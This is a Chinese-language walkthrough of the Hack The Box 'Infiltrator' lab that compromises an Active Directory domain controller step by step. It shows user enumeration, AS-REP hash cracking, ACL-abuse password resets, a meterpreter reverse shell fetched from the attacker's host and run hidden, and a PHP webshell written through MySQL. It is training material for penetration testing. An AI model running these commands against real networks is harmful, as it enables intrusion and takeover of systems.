HTB-Infiltrator域渗透实战教学文档<\/h1>

1. 目标信息收集<\/h2>

1.1 端口扫描与识别<\/h3>
使用Nmap进行端口扫描，发现以下开放端口：<\/p>
53\/tcp    - domain (DNS服务)
80\/tcp    - http (IIS 10.0)
88\/tcp    - kerberos-sec
135\/tcp   - msrpc
139\/tcp   - netbios-ssn
389\/tcp   - ldap (Active Directory)
445\/tcp   - microsoft-ds (SMB)
464\/tcp   - kpasswd5
593\/tcp   - ncacn_http (RPC over HTTP)
636\/tcp   - ldapssl
3268\/tcp  - globalcatLDAP
3269\/tcp  - globalcatLDAPssl
3389\/tcp  - ms-wbt-server (RDP)
5985\/tcp  - wsman (WinRM)
9389\/tcp  - adws
15220\/tcp - unknown
15230\/tcp - unknown
<\/code><\/pre>
1.2 域名与主机识别<\/h3>

域名：infiltrator.htb<\/code><\/li>
主机名：dc01.infiltrator.htb<\/code><\/li>
操作系统：Windows Server 2019 (Build 17763)<\/li>
<\/ul>
2. 域渗透准备工作<\/h2>
2.1 DNS服务器配置<\/h3>
配置本地DNS服务器指向目标机器：<\/p>
sudo vim \/etc\/resolv.conf
<\/span><\/span># 添加以下内容<\/span>
<\/span><\/span>nameserver 10.10.11.31
<\/span><\/span>nameserver 192.168.122.1
<\/span><\/span><\/code><\/pre>验证DNS解析：<\/p>
nslookup dc01.infiltrator.htb
<\/span><\/span><\/code><\/pre>3. WEB渗透与用户枚举<\/h2>
3.1 80端口信息收集<\/h3>
从网站页面提取团队成员信息：<\/p>
curl -s http:\/\/dc01.infiltrator.htb | xmllint --html --xpath "\/\/div\/div\/h4"<\/span> -
<\/span><\/span><\/code><\/pre>提取的用户名列表：<\/p>
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
<\/code><\/pre>
3.2 构造域用户字典<\/h3>
使用awk生成可能的域用户名格式：<\/p>
awk '{
<\/span><\/span><\/span>  name = $0
<\/span><\/span><\/span>  split(name, parts, " ")
<\/span><\/span><\/span>  first = tolower(parts[1])
<\/span><\/span><\/span>  last = tolower(parts[2])
<\/span><\/span><\/span>  print first "." last "@infiltrator.htb"
<\/span><\/span><\/span>  print first "_" last "@infiltrator.htb"
<\/span><\/span><\/span>  print substr(first, 1, 1) "." last "@infiltrator.htb"
<\/span><\/span><\/span>  print substr(first, 1, 1) "_" last "@infiltrator.htb"
<\/span><\/span><\/span>}'<\/span> username > AD_username
<\/span><\/span><\/code><\/pre>3.3 使用kerbrute枚举有效用户<\/h3>
kerbrute userenum -d infiltrator.htb AD_username
<\/span><\/span># 如果没有配置DNS，需要指定DC<\/span>
<\/span><\/span>kerbrute userenum -d infiltrator.htb AD_username --dc dc01.infiltrator.htb
<\/span><\/span><\/code><\/pre>验证的有效用户：<\/p>
o.martinez@infiltrator.htb
d.anderson@infiltrator.htb
k.turner@infiltrator.htb
a.walker@infiltrator.htb
m.harris@infiltrator.htb
e.rodriguez@infiltrator.htb
l.clark@infiltrator.htb
<\/code><\/pre>
4. Kerberos攻击与HASH破解<\/h2>
4.1 获取不需要预认证的用户HASH<\/h3>
impacket-GetNPUsers infiltrator.htb\/ -usersfile AD_usr -outputfile outputusers.txt -no-pass
<\/span><\/span># 如果没有配置DNS<\/span>
<\/span><\/span>impacket-GetNPUsers infiltrator.htb\/ -usersfile AD_usr -outputfile outputusers.txt -no-pass -dc-ip dc01.infiltrator.htb
<\/span><\/span><\/code><\/pre>发现l.clark@infiltrator.htb<\/code>不需要预认证，获取到其HASH。<\/p>
4.2 使用hashcat破解HASH<\/h3>
识别HASH类型：<\/p>
hashcat l.clark@infiltrator.htb_hash
<\/span><\/span># 识别为18200类型 (Kerberos 5, etype 23, AS-REP)<\/span>
<\/span><\/span><\/code><\/pre>破解HASH：<\/p>
hashcat l.clark@infiltrator.htb_hash -a 0<\/span> -m 18200<\/span> \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>破解结果：<\/p>
l.clark@infiltrator.htb:WAT?watismypass!
<\/code><\/pre>
5. 横向移动与权限提升<\/h2>
5.1 尝试使用psexec<\/h3>
impacket-psexec infiltrator.htb\/l.clark:WAT?watismypass\!<\/span>@dc01.infiltrator.htb
<\/span><\/span><\/code><\/pre>5.2 使用bloodhound分析域结构<\/h3>
收集数据：<\/p>
bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!'<\/span> -c all -ns 10.10.11.31 --zip
<\/span><\/span><\/code><\/pre>发现攻击链：<\/p>
D.ANDERSON@INFILTRATOR.HTB ---GenericAll--->MARKETING DIGITAL@INFILTRATOR.HTB
MARKETING DIGITAL@INFILTRATOR.HTB ---Contains--->E.RODRIGUEZ@INFILTRATOR.HTB
E.RODRIGUEZ@INFILTRATOR.HTB---addself--->CHIEFS MARKETING@INFILTRATOR.HTB
CHIEFS MARKETING@INFILTRATOR.HTB---forcechangepassword---> M.HARRIS@INFILTRATOR.HTB
<\/code><\/pre>
5.3 执行攻击链<\/h3>

为d.anderson获取TGT：<\/li>
<\/ol>
impacket-getTGT infiltrator.htb\/d.anderson:'WAT?watismypass!'<\/span> -dc-ip dc01.infiltrator.htb
<\/span><\/span>export KRB5CCNAME=<\/span>d.anderson.ccache
<\/span><\/span><\/code><\/pre>
修改ACL让d.anderson获得对MARKETING DIGITAL的完全控制：<\/li>
<\/ol>
dacledit.py -action 'write'<\/span> -rights 'FullControl'<\/span> -inheritance -principal 'd.anderson'<\/span> -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB'<\/span> 'infiltrator.htb\/d.anderson'<\/span> -k -no-pass -dc-ip dc01.infiltrator.htb
<\/span><\/span><\/code><\/pre>
重置e.rodriguez的密码：<\/li>
<\/ol>
python \/opt\/AD_tools\/bloodyAD\/bloodyAD.py --host "dc01.infiltrator.htb"<\/span> -d "infiltrator.htb"<\/span> --kerberos --dc-ip 10.10.11.31 -u "d.anderson"<\/span> -p "WAT?watismypass\!"<\/span> set password "e.rodriguez"<\/span> "QWEasd123@123"<\/span>
<\/span><\/span><\/code><\/pre>
将e.rodriguez添加到CHIEFS MARKETING组：<\/li>
<\/ol>
getTGT.py infiltrator.htb\/"e.rodriguez"<\/span>:"QWEasd123@123"<\/span> -dc-ip dc01.infiltrator.htb
<\/span><\/span>export KRB5CCNAME=<\/span>e.rodriguez.ccache
<\/span><\/span>python \/opt\/AD_tools\/bloodyAD\/bloodyAD.py --host "dc01.infiltrator.htb"<\/span> -d "infiltrator.htb"<\/span> --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB"<\/span> e.rodriguez
<\/span><\/span><\/code><\/pre>
重置m.harris的密码：<\/li>
<\/ol>
python \/opt\/AD_tools\/bloodyAD\/bloodyAD.py --host "dc01.infiltrator.htb"<\/span> -d "infiltrator.htb"<\/span> --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez"<\/span> -p "QWEasd123@123"<\/span> set password "m.harris"<\/span> "QWEasd123@123"<\/span>
<\/span><\/span><\/code><\/pre>
使用evil-winrm连接：<\/li>
<\/ol>
getTGT.py infiltrator.htb\/m.harris:'QWEasd123@123'<\/span> -dc-ip dc01.infiltrator.htb
<\/span><\/span>export KRB5CCNAME=<\/span>m.harris.ccache
<\/span><\/span>evil-winrm -i dc01.infiltrator.htb -u m.harris -r infiltrator.htb
<\/span><\/span><\/code><\/pre>6. 权限维持<\/h2>
生成反向shell：<\/p>
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>10.10.16.2 LPORT=<\/span>9001<\/span> -f exe -o reverse.exe
<\/span><\/span><\/code><\/pre>启动HTTP服务器：<\/p>
python -m http.server 80<\/span>
<\/span><\/span><\/code><\/pre>在目标机器下载并执行：<\/p>
wget http:<\/span>\/\/10.10.16.2\/reverse.exe -o reverse.exe
<\/span><\/span>Start-Process -FilePath "reverse.exe"<\/span> -WindowStyle Hidden
<\/span><\/span><\/code><\/pre>启动监听：<\/p>
msfconsole -q -x "use multi\/handler; set payload windows\/x64\/meterpreter\/reverse_tcp; set lhost 10.10.16.2; set lport 9001; exploit -j"<\/span>
<\/span><\/span><\/code><\/pre>7. 提权与最终渗透<\/h2>
7.1 使用PEASS-NG枚举提权路径<\/h3>
start \/b winPEASx64.exe >> output.txt
<\/span><\/span><\/code><\/pre>发现可疑进程：<\/p>
OMServerService
outputmessenger_httpd
outputmessenger_mysqld
<\/code><\/pre>
7.2 MySQL提权<\/h3>

端口转发MySQL服务：<\/li>
<\/ol>
portfwd add -l 53366<\/span> -L 0.0.0.0 -p 14406<\/span> -r 10.10.11.31
<\/span><\/span><\/code><\/pre>
连接MySQL：<\/li>
<\/ol>
mysql -h 127.0.0.1 -uroot -P 53366<\/span> -p
<\/span><\/span># 密码为ibWijteig5<\/span>
<\/span><\/span><\/code><\/pre>
读取敏感文件：<\/li>
<\/ol>
SELECT<\/span> LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt'<\/span>);
<\/span><\/span><\/code><\/pre>
尝试UDF提权（失败）：<\/li>
<\/ol>
USE mysql;
<\/span><\/span>CREATE<\/span> TABLE<\/span> npn(line blob);
<\/span><\/span>INSERT<\/span> INTO<\/span> npn values<\/span>(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'<\/span>));
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> mysql.npn INTO<\/span> DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll'<\/span>;
<\/span><\/span>CREATE<\/span> FUNCTION<\/span> sys_exec RETURNS<\/span> integer SONAME 'lib_mysqludf_sys_32.dll'<\/span>;
<\/span><\/span><\/code><\/pre>7.3 Apache提权<\/h3>

端口转发Apache服务：<\/li>
<\/ol>
portfwd add -l 14126<\/span> -L 0.0.0.0 -p 14126<\/span> -r 10.10.11.31
<\/span><\/span><\/code><\/pre>
通过MySQL写入webshell：<\/li>
<\/ol>
select<\/span> "<?php echo `whoami`;?>"<\/span> INTO<\/span> OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php"<\/span>;
<\/span><\/span><\/code><\/pre>
访问webshell获取system权限：<\/li>
<\/ol>
http:\/\/127.0.0.1:14126\/whoami.php
<\/code><\/pre>
8. 总结<\/h2>
本次渗透测试完整流程：<\/p>

信息收集与用户枚举<\/li>
Kerberos攻击获取HASH并破解<\/li>
使用bloodhound分析域结构<\/li>
通过ACL滥用实现权限提升<\/li>
权限维持与横向移动<\/li>
通过MySQL和Apache服务获取最终权限<\/li>
<\/ol>
关键点：<\/p>

正确配置DNS对域渗透至关重要<\/li>
Kerberos预认证漏洞是常见的攻击入口<\/li>
bloodhound是分析域结构的强大工具<\/li>
ACL滥用是域渗透中的常见技术<\/li>
服务配置不当可能导致直接提权<\/li>
<\/ul>